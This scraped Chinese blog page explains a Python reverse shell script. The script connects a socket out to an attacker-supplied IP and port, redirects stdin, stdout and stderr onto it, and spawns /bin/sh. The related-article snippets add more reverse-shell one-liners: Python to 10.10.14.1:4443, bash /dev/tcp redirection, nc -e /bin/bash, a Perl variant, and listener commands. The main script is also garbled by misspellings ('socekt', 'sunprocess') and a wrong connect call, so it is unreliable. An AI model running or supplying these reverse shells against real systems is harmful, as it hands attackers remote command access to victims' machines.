一个常见反弹shell脚本详解

最新推荐文章于 2023-05-16 11:14:39 发布
最新推荐文章于 2023-05-16 11:14:39 发布
阅读量103 收藏
点赞数
分类专栏: hack 文章标签: python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kangzinian/article/details/120329922
版权 
# !/usr/bin/python
import os, subprocess,socket

s = socket.socekt(socket.AF_INET,scoket.SOCK_STREAM)
s.connect("IP","port")
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

p = sunprocess.call(["/bin/sh","-i"])
fileno() 方法返回一个整型的文件描述符(file descriptor FD 整型),可用于底层操作系统的 I/O 操作。

os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2。

语法格式
os.dup2(fd, fd2);

  • fd – 要被复制的文件描述符

  • fd2 – 复制的文件描述符

sunprocess.call() 这个方法的作用是执行一些命令行的命令

圣默
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell脚本
Soul Blog
11-23 3238
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
反弹 shell 脚本
eT48_Sec
02-09 626
从大马里面提取出来的,分别用perl 和 C实现 。 保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。 在192.168.1.111 上执行 nc -v -l -p 13123 #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`
常用的反弹shell脚本
weixin_30606461的博客
12-07 130
bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1 Python shell 反弹脚本 #!/usr/bin/python # This is a Python reverse shell script import socket,subprocess,...
linux 反弹脚本,linux反弹shell的原理详解
weixin_36219012的博客
04-30 299
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
Linux简单渗透、反弹shell常见脚本反弹方法
zhao__b的博客
11-26 2313
Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。 第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。 第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。 第三步:把刚才..
常见windwos提权笔记
最新发布
03-30
### 常见Windows提权方法详解 #### 一、提权概述 **提权**,即提升权限,指的是在获得目标系统较低级别权限的基础上,进一步获取更高级别的权限,通常是为了达到对整个系统的完全控制。对于Windows系统而言,提权...
Linux下非交互式提权详解
09-15
在无法反弹shell的情况下,这种方法尤为实用,因为它允许在没有交互环境的情况下运行提权工具并检查结果。 首先,文章中提到了一个简单的PHP脚本`proce_open()`,这个脚本接收两个参数:提权工具的绝对路径和需要...
2021年江苏省职业院校技能大赛-网络信息安全赛项试卷-学生组V4(1).docx
07-09
- 木马与反制:理解反弹shell原理,会使用MSF(Metasploit Framework)进行监听和控制。 - 团队协作:在分组对抗中,需要良好的沟通和协同作战能力。 此赛项全面检验了中职学生的网络安全实战技能,有助于培养他们...
BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986)1
08-08
d) 反弹shell,发送另一条POST请求,执行bash命令以创建一个到攻击者控制的IP和端口的shell。 6. **利用脚本** 针对此漏洞,有公开的GitHub项目(如Al1ex/CVE-2021-22986)提供了自动化利用工具,帮助安全研究...
Metasploit新手指南
10-09
本指南提供了关于如何使用Msfvenom生成payload参数的详解,并通过实例讲解了如何利用aspx脚本反弹shell并提权Windows服务器。 在高级应用方面,本指南还涵盖了如何使用msfvenom编码生成及https载荷、如何通过...
Linux反弹shell常见脚本反弹
shangMD01的博客
11-29 150
0x01.bash 在攻击主机上进行监听,命令:nc -lvvp port //potr为攻击主机的端口号 ──(shang㉿bogon)-[~] └─$ nc -lvvp 1234 listening on [any] 1234 ... 在目标主机上执行,命令:bash -i>& /dev/tcp/攻击主机IP/port 0>&1 攻击主机的代码变为: ┌──(shang㉿bogon)-[~] └─$ nc -lvvp 1234 listenin...
反弹shell汇总(超详细)
qq_52173020的博客
05-27 8360
反弹shell姿势大全,看这一篇就够啦~
使用python反弹shell
weixin_43803070的博客
07-10 2030
先上脚本: #!/usr/bin/python #coding=utf-8 import os,subprocess,socket s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.107",19)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) ...
各种shell反弹方法
weixin_46626737的博客
05-16 2680
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
常见反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
10种反弹shell方式
kevinhanser
03-30 4906
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
Linux反弹shell的三种方法
ChinaWin的博客
09-12 3465
Linux反弹shell的三种方法
多种姿势反弹shell
Brucetg的博客
08-20 7129
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
CTF-SSH
weixin_45778981的博客
01-09 3244
CTF-SSH(笔记+总结) 思路:对网络进行扫描,寻找可疑主机,对目标主机进行端口扫描,特别注意大端口和特殊端口,在端口中寻找关键文件、可疑文件,注意id_rsa,远程登录目标主机,判断获取用户类型,进行提权最终获取root用户,获取flag。 netdiscover -r ip/netmask nmap -sV ip nmap -A -v ip nmap -O ip dirb http://ip:端口 nikto -host ip ssh -i id_rsa 用户名@ip chmod 600 id_rs
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值